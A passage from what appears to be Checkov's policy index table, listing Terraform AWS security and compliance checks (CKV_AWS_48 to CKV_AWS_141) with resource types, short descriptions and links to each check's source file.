[DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py) | -| 111 | CKV_AWS_48 | resource | aws_mq_broker | Ensure MQ Broker logging is enabled | Terraform | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py) | -| 112 | CKV_AWS_49 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py) | -| 113 | CKV_AWS_50 | resource | aws_lambda_function | X-Ray tracing is enabled for Lambda | Terraform | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py) | -| 114 | CKV_AWS_51 | resource | aws_ecr_repository | Ensure ECR Image Tags are immutable | Terraform | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py) | -| 115 | CKV_AWS_53 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public ACLS enabled | Terraform | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py) | -| 116 | CKV_AWS_54 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public policy enabled | Terraform | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py) | -| 117 | CKV_AWS_55 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has ignore public ACLs enabled | Terraform | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py) | -| 118 | CKV_AWS_56 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has 'restrict_public_buckets' enabled | Terraform | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py) | -| 119 | CKV_AWS_57 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) | -| 120 | CKV_AWS_57 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) | -| 121 | CKV_AWS_58 | resource | aws_eks_cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Terraform | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py) | -| 122 | CKV_AWS_59 | resource | aws_api_gateway_method | Ensure there is no open access to back-end resources through API | Terraform | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py) | -| 123 | CKV_AWS_60 | resource | aws_iam_role | Ensure IAM role allows only specific services or principals to assume it | Terraform | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py) | -| 124 | CKV_AWS_61 | resource | aws_iam_role | Ensure AWS IAM policy does not allow assume role permission across all services | Terraform | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) | -| 125 | CKV_AWS_62 | resource | aws_iam_group_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 126 | CKV_AWS_62 | resource | aws_iam_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 127 | CKV_AWS_62 | resource | aws_iam_role_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 128 | CKV_AWS_62 | resource | aws_iam_user_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 129 | CKV_AWS_62 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 130 | CKV_AWS_63 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 131 | CKV_AWS_63 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 132 | CKV_AWS_63 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 133 | CKV_AWS_63 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 134 | CKV_AWS_63 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 135 | CKV_AWS_64 | resource | aws_redshift_cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Terraform | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py) | -| 136 | CKV_AWS_65 | resource | aws_ecs_cluster | Ensure container insights are enabled on ECS cluster | Terraform | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py) | -| 137 | CKV_AWS_66 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group specifies retention days | Terraform | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py) | -| 138 | CKV_AWS_67 | resource | aws_cloudtrail | Ensure CloudTrail is enabled in all Regions | Terraform | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py) | -| 139 | CKV_AWS_68 | resource | aws_cloudfront_distribution | CloudFront Distribution should have WAF enabled | Terraform | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py) | -| 140 | CKV_AWS_69 | resource | aws_mq_broker | Ensure MQ Broker is not publicly exposed | Terraform | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py) | -| 141 | CKV_AWS_70 | resource | aws_s3_bucket | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) | -| 142 | CKV_AWS_70 | resource | aws_s3_bucket_policy | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) | -| 143 | CKV_AWS_71 | resource | aws_redshift_cluster | Ensure Redshift Cluster logging is enabled | Terraform | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py) | -| 144 | CKV_AWS_72 | resource | aws_sqs_queue_policy | Ensure SQS policy does not allow ALL (*) actions. | Terraform | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py) | -| 145 | CKV_AWS_73 | resource | aws_api_gateway_stage | Ensure API Gateway has X-Ray Tracing enabled | Terraform | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py) | -| 146 | CKV_AWS_74 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Terraform | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py) | -| 147 | CKV_AWS_75 | resource | aws_globalaccelerator_accelerator | Ensure Global Accelerator accelerator has flow logs enabled | Terraform | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py) | -| 148 | CKV_AWS_76 | resource | aws_api_gateway_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | -| 149 | CKV_AWS_76 | resource | aws_apigatewayv2_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | -| 150 | CKV_AWS_77 | resource | aws_athena_database | Ensure Athena Database is encrypted at rest (default is unencrypted) | Terraform | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py) | -| 151 | CKV_AWS_78 | resource | aws_codebuild_project | Ensure that CodeBuild Project encryption is not disabled | Terraform | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py) | -| 152 | CKV_AWS_79 | resource | aws_instance | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | -| 153 | CKV_AWS_79 | resource | aws_launch_configuration | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | -| 154 | CKV_AWS_79 | resource | aws_launch_template | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | -| 155 | CKV_AWS_80 | resource | aws_msk_cluster | Ensure MSK Cluster logging is enabled | Terraform | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py) | -| 156 | CKV_AWS_81 | resource | aws_msk_cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Terraform | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py) | -| 157 | CKV_AWS_82 | resource | aws_athena_workgroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Terraform | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py) | -| 158 | CKV_AWS_83 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | -| 159 | CKV_AWS_83 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | -| 160 | CKV_AWS_84 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 161 | CKV_AWS_84 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 162 | CKV_AWS_85 | resource | aws_docdb_cluster | Ensure DocumentDB Logging is enabled | Terraform | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py) | -| 163 | CKV_AWS_86 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has Access Logging enabled | Terraform | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py) | -| 164 | CKV_AWS_87 | resource | aws_redshift_cluster | Redshift cluster should not be publicly accessible | Terraform | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py) | -| 165 | CKV_AWS_88 | resource | aws_instance | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | -| 166 | CKV_AWS_88 | resource | aws_launch_template | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | -| 167 | CKV_AWS_89 | resource | aws_dms_replication_instance | DMS replication instance should not be publicly accessible | Terraform | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | -| 168 | CKV_AWS_90 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB TLS is not disabled | Terraform | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py) | -| 169 | CKV_AWS_91 | resource | aws_alb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | -| 170 | CKV_AWS_91 | resource | aws_lb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | -| 171 | CKV_AWS_92 | resource | aws_elb | Ensure the ELB has access logging enabled | Terraform | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py) | -| 172 | CKV_AWS_93 | resource | aws_s3_bucket | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | -| 173 | CKV_AWS_93 | resource | aws_s3_bucket_policy | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | -| 174 | CKV_AWS_94 | resource | aws_glue_data_catalog_encryption_settings | Ensure Glue Data Catalog Encryption is enabled | Terraform | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py) | -| 175 | CKV_AWS_96 | resource | aws_rds_cluster | Ensure all data stored in Aurora is securely encrypted at rest | Terraform | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py) | -| 176 | CKV_AWS_97 | resource | aws_ecs_task_definition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Terraform | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | -| 177 | CKV_AWS_98 | resource | aws_sagemaker_endpoint_configuration | Ensure all data stored in the Sagemaker Endpoint is securely encrypted at rest | Terraform | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py) | -| 178 | CKV_AWS_99 | resource | aws_glue_security_configuration | Ensure Glue Security Configuration Encryption is enabled | Terraform | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py) | -| 179 | CKV_AWS_100 | resource | aws_eks_node_group | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Terraform | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | -| 180 | CKV_AWS_101 | resource | aws_neptune_cluster | Ensure Neptune logging is enabled | Terraform | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py) | -| 181 | CKV_AWS_102 | resource | aws_neptune_cluster_instance | Ensure Neptune Cluster instance is not publicly available | Terraform | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py) | -| 182 | CKV_AWS_103 | resource | aws_alb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 183 | CKV_AWS_103 | resource | aws_lb | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 184 | CKV_AWS_103 | resource | aws_lb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 185 | CKV_AWS_104 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB has audit logs enabled | Terraform | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py) | -| 186 | CKV_AWS_105 | resource | aws_redshift_parameter_group | Ensure Redshift uses SSL | Terraform | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py) | -| 187 | CKV_AWS_106 | resource | aws_ebs_encryption_by_default | Ensure EBS default encryption is enabled | Terraform | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py) | -| 188 | CKV_AWS_107 | data | aws_iam_policy_document | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py) | -| 189 | CKV_AWS_108 | data | aws_iam_policy_document | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py) | -| 190 | CKV_AWS_109 | data | aws_iam_policy_document | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py) | -| 191 | CKV_AWS_110 | data | aws_iam_policy_document | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py) | -| 192 | CKV_AWS_111 | data | aws_iam_policy_document | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py) | -| 193 | CKV_AWS_112 | resource | aws_ssm_document | Ensure Session Manager data is encrypted in transit | Terraform | [SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py) | -| 194 | CKV_AWS_113 | resource | aws_ssm_document | Ensure Session Manager logs are enabled and encrypted | Terraform | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py) | -| 195 | CKV_AWS_114 | resource | aws_emr_cluster | Ensure that EMR clusters with Kerberos have Kerberos Realm set | Terraform | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py) | -| 196 | CKV_AWS_115 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Terraform | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | -| 197 | CKV_AWS_116 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Terraform | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py) | -| 198 | CKV_AWS_117 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured inside a VPC | Terraform | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py) | -| 199 | CKV_AWS_118 | resource | aws_db_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | -| 200 | CKV_AWS_118 | resource | aws_rds_cluster_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | -| 201 | CKV_AWS_119 | resource | aws_dynamodb_table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Terraform | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py) | -| 202 | CKV_AWS_120 | resource | aws_api_gateway_stage | Ensure API Gateway caching is enabled | Terraform | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py) | -| 203 | CKV_AWS_121 | resource | aws_config_configuration_aggregator | Ensure AWS Config is enabled in all regions | Terraform | [ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py) | -| 204 | CKV_AWS_122 | resource | aws_sagemaker_notebook_instance | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance | Terraform | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py) | -| 205 | CKV_AWS_123 | resource | aws_vpc_endpoint_service | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Terraform | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) | -| 206 | CKV_AWS_124 | resource | aws_cloudformation_stack | Ensure that CloudFormation stacks are sending event notifications to an SNS topic | Terraform | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py) | -| 207 | CKV_AWS_126 | resource | aws_instance | Ensure that detailed monitoring is enabled for EC2 instances | Terraform | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py) | -| 208 | CKV_AWS_127 | resource | aws_elb | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager | Terraform | [ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py) | -| 209 | CKV_AWS_129 | resource | aws_db_instance | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled | Terraform | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py) | -| 210 | CKV_AWS_130 | resource | aws_subnet | Ensure VPC subnets do not assign public IP by default | Terraform | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py) | -| 211 | CKV_AWS_131 | resource | aws_alb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | -| 212 | CKV_AWS_131 | resource | aws_lb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | -| 213 | CKV_AWS_133 | resource | aws_db_instance | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | -| 214 | CKV_AWS_133 | resource | aws_rds_cluster | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | -| 215 | CKV_AWS_134 | resource | aws_elasticache_cluster | Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on | Terraform | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py) | -| 216 | CKV_AWS_135 | resource | aws_instance | Ensure that EC2 is EBS optimized | Terraform | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py) | -| 217 | CKV_AWS_136 | resource | aws_ecr_repository | Ensure that ECR repositories are encrypted using KMS | Terraform | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py) | -| 218 | CKV_AWS_137 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | -| 219 | CKV_AWS_137 | resource | aws_opensearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | -| 220 | CKV_AWS_138 | resource | aws_elb | Ensure that ELB is cross-zone-load-balancing enabled | Terraform | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py) | -| 221 | CKV_AWS_139 | resource | aws_rds_cluster | Ensure that RDS clusters have deletion protection enabled | Terraform | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py) | -| 222 | CKV_AWS_140 | resource | aws_rds_global_cluster | Ensure that RDS global clusters are encrypted | Terraform | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py) | -| 223 | CKV_AWS_141 | resource | aws_redshift_cluster | Ensured that Redshift cluster allowing version upgrade by default | Terraform | 